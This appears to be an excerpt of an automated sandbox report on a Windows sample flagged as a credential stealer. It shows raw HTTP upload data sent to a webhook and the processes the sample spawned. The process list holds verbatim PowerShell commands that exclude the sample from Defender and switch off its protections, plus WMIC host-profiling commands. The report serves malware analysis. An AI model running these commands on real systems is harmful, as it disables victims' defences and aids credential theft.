                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: e5 48 14 73 36 31 36 69 0e 72 13 b7 36 56 2f 99 35 f7 11 c5 69 7e 8c 51 6b bd 54 14 f4 61 69 cd a6 60 1d 61 1a e5 02 5c 6b cc cb ae 8e eb d0 19 54 26 1b 23 cf 5b 45 37 29 ac 4f 1b 6f 04 19 6b 4d de c1 a3 06 c5 27 51 60 de ed bc ec af f1 84 ac 5a dd 4c cc 96 6c 4a e9 86 b3 bd ff 8a 1d aa 0f e4 1b 1f aa 40 21 20 1c ef bb d2 6b 93 73 97 5a 59 33 db 35 0d 55 bf aa db fc 70 35 5d 28 f1 ed db 29 bd 69 43 4e d9 ed b1 a1 b7 20 39 51 45 6e fd 12 3f 4f c0 17 00 2d f6 06 29 20 c2 18 88 97 8f c8 0b 28 12 78 1e 97 5d 6d b0 25 3b b2 76 3e 6c 8b 25 7a ef 11 d6 f7 e6 62 81 44 2c c2 93 07 64 d0 2e 1c b4 1e 85 b4 04 8c d8 6e ff 6e ce b4 0b db 79 30 c5 1b 08 7e 1d 36 c0 df 82 f8 2a a2 46 bb d0 fc a4 0f dc 29 bf af c1 f8 ea 6e 87 b9 11 d8 f8 98 34 e7 5e ad c6 fc 52 99 32 ea
                                                                                                                      Data Ascii: Hs616ir6V/5i~QkTai`a\kT&#[E7)OokM'Q`ZLlJ@! ksZY35Up5]()iCN 9QEn?O-) (x]m%;v>l%zbD,d.nny0~6*F)n4^R2
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: 89 57 53 bc a7 b6 69 b8 6c 23 89 37 f8 86 ec 39 c7 05 d6 ad f8 4f 0e ec 5e 26 67 5b 0f 5f f7 c1 11 85 a5 32 26 12 8b 35 89 80 19 28 d6 bb f6 02 7a b0 3c 66 6d ee fe 80 ed 0b 8f 35 82 1d c1 12 96 87 5f bd 5e 54 75 6a 53 c8 92 1e bf 33 39 de cf 14 2b 48 0f 6e b2 cc d8 ad 21 aa 00 ab fe e0 c3 bd 72 aa 8b 70 bf c0 09 d3 65 bd 21 64 9c 2d 74 94 e5 3e 10 6d 6c c1 ae eb 95 e1 dc 82 83 8b ae 00 b5 d6 c9 4f 3b c5 2b 77 0c e7 56 a8 03 0b 04 ef 6f 7e 84 b6 6f 3b 27 86 82 29 95 45 41 86 cc 83 d8 f4 b9 2f 97 bf 39 c6 f5 f8 7d ba 58 34 11 55 7b ca fd f1 01 38 1c 54 bf 72 d9 8e 7c 56 aa 80 ad cf 09 f9 db 70 6d 02 98 74 88 73 6f 62 7c 6d 1f 30 aa 27 b8 bd 5b 77 e3 06 e7 3a 70 7b ee 41 c9 63 1b 97 51 15 fb 43 be cb 9a 2b 78 15 6f fb 4b bb 7f 65 8f de da 58 c6 ae 16 de 78
                                                                                                                      Data Ascii: WSil#79O^&g[_2&5(z<fm5_^TujS39+Hn!rpe!d-t>mlO;+wVo~o;')EA/9}X4U{8Tr|Vpmtsob|m0'[w:p{AcQC+xoKeXx
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: 10 5e e6 65 35 b1 2f 1f 7f fe a7 e2 be 2b 7a af 75 f3 83 f3 8a d9 28 7c ba 2c 9d d0 d7 12 1b 14 6f ac fe ef 49 b9 5a 3c 24 14 94 f5 4f 82 e7 15 7f 91 4a 3d 87 ae 43 26 1a 95 4c 03 85 2d fb eb 16 9b 5e 97 37 bc 51 42 91 af 3f 6d a7 6f 5c 8b 8c e1 70 20 57 61 e3 62 3d 47 23 25 45 2f 4d 4a d4 07 5f a0 eb 1d 29 41 3b 53 4f c7 89 f6 c8 bd f4 a4 f7 f3 b6 6e 1d 0a ab 6c 78 f1 0e 09 38 cc d4 1f 25 58 26 b3 75 cc 37 25 a4 11 01 9c be 55 97 bd 7c a8 8d 5e 22 03 48 a7 13 82 d8 b1 f0 92 a3 1d e0 d7 f4 32 bc 5c 4e 2d 8b 1d ca 52 71 dd 34 1d 40 9e 9d f7 7a 9a 56 d8 02 d5 fb 90 ed df 0f aa 62 3d ca 9f d4 cd f4 bc 05 c3 56 fd ff f6 35 14 81 d2 dd 84 bf 37 3e 79 ca d3 fa ec 05 6f 9b 16 fc 56 27 69 b9 16 18 50 06 b1 b3 d3 f7 32 00 42 dc 1f a9 3b 96 ac 0f 1e d6 f2 04 5f ce
                                                                                                                      Data Ascii: ^e5/+zu(|,oIZ<$OJ=C&L-^7QB?mo\p Wab=G#%E/MJ_)A;SOnlx8%X&u7%U|^"H2\N-Rq4@zVb=V57>yoV'iP2B;_
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: 7c a1 79 ee 0b 44 1b b8 c0 78 d5 d1 3d 7b ed 05 d5 d1 ff bc 6f e9 3a 2e 4a cc fc ca 6e 2c 89 01 dc 11 5e d2 3a bb ac 8c 9d 8b f0 04 a7 20 3d 37 97 de bc ee e8 d9 4c 3e f8 f7 aa 64 1a f7 cb 6a e9 1f cd 9a fb 8e dd 93 29 7e ad a6 73 7d 70 dc 4c 4d 60 1a 7c 07 4d 53 5f eb c3 7d 40 48 b3 06 09 21 3b 66 e0 e3 a8 28 cc d7 57 8a fd d0 46 23 ee 37 1d fa a2 a6 00 b2 df 50 3a 60 a6 89 78 c3 7d 25 60 95 dd dd 28 6c 64 83 a2 98 b6 61 3f ab f8 63 96 93 94 7c 74 2f c7 3e 14 f7 e8 5a c5 5d be d5 a3 91 1b 35 f6 28 7a da ea 80 b1 66 76 59 cf ef 47 b5 8b c3 63 2b 57 50 b9 07 93 b9 e9 23 47 0b 3d 19 d6 de 01 bb d3 3d 75 5f 0f da 5c b1 3f 8e b6 f0 8a ab ab 7b 4d 37 6a 34 48 7b 8a 35 b5 c7 53 83 35 b5 a4 ad 73 63 63 d8 00 5b af 5d 6b c7 f1 b1 cd 9f d4 e5 55 7a 07 f5 f7 ea c1
                                                                                                                      Data Ascii: |yDx={o:.Jn,^: =7L>dj)~s}pLM`|MS_}@H!;f(WF#7P:`x}%`(lda?c|t/>Z]5(zfvYGc+WP#G==u_\?{M7j4H{5S5scc[]kUz
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: 5c 6b 46 1e 5c 85 75 eb 1b dc 5f e8 b3 36 bf 41 6b f6 19 21 dd b9 0c c3 72 cc b8 59 17 fa 78 3b e7 f1 71 ec 64 e8 13 e1 33 84 bc e6 25 3f aa bc 77 1a d1 4b 9e ed 2c 30 5f 4c 8e d1 a3 1c 7c f3 35 ef 89 e9 67 74 3e 7c c7 66 2b 7c aa 3c 2e c9 ef a6 c1 3e 4e 66 06 cb cd 8b 85 41 1b 74 30 ab b2 83 ad ef ea 47 e1 43 5f b3 5e 3e b5 1e 31 09 9f bf a2 da d9 88 60 17 b1 3c 13 a6 79 08 bc 07 d1 42 25 2f 36 3e 8c 6a 19 6a 8d c3 16 bd 3d 7a e7 ce 6c 6b 62 9c af cb 80 45 fc e2 0c f2 8f 62 29 6c 07 c5 a3 4f ef be 19 b5 9d 16 91 57 22 7d 51 8f 43 69 36 47 3d d8 e4 f7 5b 50 a1 2a 74 eb 19 8f 2b af e6 42 ee 27 6c 04 dc 4d 0d 2f 7a 59 3a 5e 59 4f d8 a6 60 af ed cc dd 0f 7a 9d 24 a1 ab 2f d5 61 d6 2d 3b b4 28 4f 9d 97 9f bf f3 dc a1 57 99 e6 1c d3 d0 de 34 5a f7 50 8a ae 28
                                                                                                                      Data Ascii: \kF\u_6Ak!rYx;qd3%?wK,0_L|5gt>|f+|<.>NfAt0GC_^>1`<yB%/6>jj=zlkbEb)lOW"}QCi6G=[P*t+B'lM/zY:^YO`z$/a-;(OW4ZP(
                                                                                                                      2024-12-05 17:24:18 UTC16355OUTData Raw: cc 5e 43 c3 cf bc de a0 41 06 0b 33 27 ac 50 a6 ca 3f fd 83 14 3e 6a 09 b8 6d 6c 7a 39 03 3f 17 35 04 1b 52 9c ce 81 aa 30 13 62 f1 75 36 eb 6d 91 3b 03 c1 23 51 fa 70 ae 01 dc dc 3d 8f 60 dd 69 95 07 76 fe f0 78 44 bf 9d 3c 6e f8 71 04 e6 2e 3e 6a b7 bf b7 1d 85 5f 72 9c 77 c6 07 c8 30 cc 64 d6 95 ef 70 b9 d0 5d 89 fe a6 34 89 51 95 08 19 49 ed 6b 5b d0 e9 51 53 86 71 d4 a7 b9 86 28 eb 9e e0 f0 23 f9 ee b8 73 66 a1 2a c3 ef a8 c5 dd b3 5e 0d ef a0 22 88 fd 4a 40 80 71 d0 ec 91 95 7f 92 f6 05 0a 11 45 09 6e 73 16 6b 8c 4e 8c 86 f0 9f 41 11 a4 a0 12 ab 3c 86 6e 00 80 7d 49 d8 5e f5 41 6c b9 78 84 db 9c 4e ac 3c e7 03 53 2c 95 20 67 2c 27 1e 6e 07 1e 3c f9 74 ed 88 1d 43 39 39 20 7f b4 4b 3c 98 77 fc e9 f5 9c e8 ec c4 e5 3b 45 ad 8e 73 a0 b2 7b 87 ff 38 e6
                                                                                                                      Data Ascii: ^CA3'P?>jmlz9?5R0bu6m;#Qp=`ivxD<nq.>j_rw0dp]4QIk[QSq(#sf*^"J@qEnskNA<n}I^AlxN<S, g,'n<tC99 K<w;Es{8
                                                                                                                      2024-12-05 17:24:18 UTC25INHTTP/1.1 100 Continue
                                                                                                                      2024-12-05 17:24:20 UTC1005INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 05 Dec 2024 17:24:20 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 45
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                      x-ratelimit-limit: 5
                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                      x-ratelimit-reset: 1733419461
                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                      via: 1.1 google
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WyWyjDLePnq502kvr%2FawAIHyqeojuKGTqRqoqhVrPIjSwNxz74L7OL7QnnahhfODn6RTjuoLvHbylzfKomCR6gmN%2FKwt%2Fahmn3uPze7treuBSONE68H9e6NPU55"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8ed5baa148145e7f-EWR
                                                                                                                      {"message": "Unknown Webhook", "code": 10015}


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:12:23:26
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe"
                                                                                                                      Imagebase:0x1ebb4d80000
                                                                                                                      File size:190'464 bytes
                                                                                                                      MD5 hash:E09F55D421CB45340A8C97C217BA56CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:12:23:30
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe'
                                                                                                                      Imagebase:0x7ff760310000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:12:23:30
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:12:23:33
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      Imagebase:0x7ff72d8c0000
                                                                                                                      File size:496'640 bytes
                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:12:23:37
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                      Imagebase:0x7ff760310000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:12:23:37
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:8
                                                                                                                      Start time:12:23:43
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"wmic.exe" os get Caption
                                                                                                                      Imagebase:0x7ff657c60000
                                                                                                                      File size:576'000 bytes
                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:9
                                                                                                                      Start time:12:23:44
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:12:23:44
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                                                      Imagebase:0x7ff657c60000
                                                                                                                      File size:576'000 bytes
                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:12:23:44
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:12:23:45
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"wmic.exe" csproduct get uuid
                                                                                                                      Imagebase:0x7ff657c60000
                                                                                                                      File size:576'000 bytes
                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:13
                                                                                                                      Start time:12:23:45
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:12:23:47
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                      Imagebase:0x7ff760310000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:12:23:47
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:16
                                                                                                                      Start time:12:23:56
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"wmic" path win32_VideoController get name
                                                                                                                      Imagebase:0x7ff657c60000
                                                                                                                      File size:576'000 bytes
                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:17
                                                                                                                      Start time:12:23:56
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:18
                                                                                                                      Start time:12:23:57
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
                                                                                                                      Imagebase:0x7ff760310000
                                                                                                                      File size:452'608 bytes
                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:19
                                                                                                                      Start time:12:23:57
                                                                                                                      Start date:05/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:16.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:100%
                                                                                                                        Total number of Nodes:3
                                                                                                                        Total number of Limit Nodes:0
                                                                                                                        execution_graph 38623 7ff887ed290c 38624 7ff887ed290f CryptUnprotectData 38623->38624 38626 7ff887ed29c3 38624->38626

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 7ff887ee31f2-7ff887ee31fb 1 7ff887ee3245-7ff887ee325c 0->1 2 7ff887ee31fd-7ff887ee321d 0->2 5 7ff887ee32a6-7ff887ee32ad 1->5 6 7ff887ee325e-7ff887ee3294 1->6 7 7ff887ee3296-7ff887ee32a5 6->7 8 7ff887ee32b1-7ff887ee32f2 6->8 7->5 14 7ff887ee3419-7ff887ee343a 8->14 15 7ff887ee32f8-7ff887ee3373 8->15 16 7ff887ee3441-7ff887ee3452 14->16 33 7ff887ee337a-7ff887ee3398 15->33 18 7ff887ee3454 16->18 19 7ff887ee3459-7ff887ee34aa 16->19 18->19 28 7ff887ee34ac-7ff887ee3523 call 7ff887ee4166 19->28 29 7ff887ee34ce-7ff887ee34d7 call 7ff887ee4166 19->29 52 7ff887ee364e-7ff887ee366f 28->52 53 7ff887ee3529-7ff887ee354a 28->53 39 7ff887ee34dc 29->39 40 7ff887ee339f-7ff887ee33ce call 7ff887ee2b10 33->40 42 7ff887ee415d-7ff887ee4165 39->42 40->16 49 7ff887ee33d0-7ff887ee3410 40->49 49->14 54 7ff887ee3676-7ff887ee3687 52->54 61 7ff887ee3555-7ff887ee35a4 53->61 62 7ff887ee354c-7ff887ee3553 53->62 56 7ff887ee368e-7ff887ee36df 54->56 57 7ff887ee3689 54->57 69 7ff887ee36e5-7ff887ee3714 56->69 70 7ff887ee37b4-7ff887ee37c2 call 7ff887ee41b4 56->70 57->56 78 7ff887ee35ab-7ff887ee35c9 61->78 62->61 81 7ff887ee3716-7ff887ee371e 69->81 82 7ff887ee376d-7ff887ee377a 69->82 70->42 85 7ff887ee35d0-7ff887ee35ff call 7ff887ee2b10 78->85 83 7ff887ee377e 81->83 84 7ff887ee3720-7ff887ee372c 81->84 82->83 86 7ff887ee37c5 83->86 87 7ff887ee377f-7ff887ee378b 83->87 94 7ff887ee373f-7ff887ee3749 84->94 95 7ff887ee372e-7ff887ee373a 84->95 85->54 102 7ff887ee3601-7ff887ee3646 85->102 89 7ff887ee37c7-7ff887ee3809 call 7ff887ee41b4 86->89 87->70 98 7ff887ee378d-7ff887ee37b2 87->98 111 7ff887ee3934-7ff887ee3955 89->111 112 7ff887ee380f-7ff887ee388a 89->112 99 7ff887ee374c-7ff887ee376c 94->99 95->99 100 7ff887ee373c-7ff887ee373d 95->100 98->89 99->82 100->94 102->52 113 7ff887ee395c-7ff887ee396d 111->113 129 7ff887ee3891-7ff887ee38af 112->129 114 7ff887ee3974-7ff887ee39c5 113->114 115 7ff887ee396f 113->115 125 7ff887ee39c7-7ff887ee3a3e call 7ff887ee4202 114->125 126 7ff887ee39e9-7ff887ee39f7 call 7ff887ee4202 114->126 115->114 147 7ff887ee3a44-7ff887ee3a65 125->147 148 7ff887ee3b66-7ff887ee3b87 125->148 126->42 136 7ff887ee38b6-7ff887ee38e5 call 7ff887ee2b10 129->136 136->113 144 7ff887ee38e7-7ff887ee392b 136->144 144->111 156 7ff887ee3a6c-7ff887ee3a7a 147->156 150 7ff887ee3b8e-7ff887ee3b9f 148->150 152 7ff887ee3ba6-7ff887ee3c30 call 7ff887ee4250 150->152 153 7ff887ee3ba1 150->153 173 7ff887ee3c36-7ff887ee3cb1 152->173 174 7ff887ee3d5b-7ff887ee3d7c 152->174 153->152 159 7ff887ee3a7c-7ff887ee3abf 156->159 168 7ff887ee3ac6-7ff887ee3ae4 159->168 172 7ff887ee3aeb-7ff887ee3b1a call 7ff887ee2b10 168->172 172->150 186 7ff887ee3b1c-7ff887ee3b60 172->186 197 7ff887ee3cb8-7ff887ee3cd6 173->197 176 7ff887ee3d83-7ff887ee3d94 174->176 179 7ff887ee3d96 176->179 180 7ff887ee3d9b-7ff887ee3dcf 176->180 179->180 190 7ff887ee3dd4-7ff887ee3dec 180->190 186->148 195 7ff887ee3e10-7ff887ee3e1e call 7ff887ee429e 190->195 196 7ff887ee3dee-7ff887ee3e3d call 7ff887ee429e 190->196 195->42 210 7ff887ee3e3f-7ff887ee3e41 196->210 205 7ff887ee3cdd-7ff887ee3d0c call 7ff887ee2b10 197->205 205->176 212 7ff887ee3d0e-7ff887ee3d59 205->212 210->42 210->190 212->174
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1953752154.00007FF887ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887ED0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887ed0000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 2_H$/B$/B$/B$/B$/B
                                                                                                                        • API String ID: 0-2525416153
                                                                                                                        • Opcode ID: e882dd64e5ed058f7363a882424b8318c6f36cadcda5dc30015a9c14cba473d1
                                                                                                                        • Instruction ID: e952f4f57ba4414fd5fb1ef217aeba7af19d2b2b554cc93faa6769d61378e0f8
                                                                                                                        • Opcode Fuzzy Hash: e882dd64e5ed058f7363a882424b8318c6f36cadcda5dc30015a9c14cba473d1
                                                                                                                        • Instruction Fuzzy Hash: C6A27330A1894A8FDB89EF28C454BAD77B2FF59340F5005B9D41ECB296CE39E842CB51

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML$XE$_N_L$/B
                                                                                                                        • API String ID: 0-3619096775
                                                                                                                        • Opcode ID: 261367d40650b9c7f2f50dc8d65a4da8e0b03fea025d1f4c80b798bb149d748e
                                                                                                                        • Instruction ID: 23fdce4bf67e8c1d0a0a56bfa750a585bd2c9439b926240b582e89ecf9f1b17f
                                                                                                                        • Opcode Fuzzy Hash: 261367d40650b9c7f2f50dc8d65a4da8e0b03fea025d1f4c80b798bb149d748e
                                                                                                                        • Instruction Fuzzy Hash: E232E46090D98A9FE745EBA894527ADBBA1FF56380F2446BDD00FC35C7CD2CA846C712
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
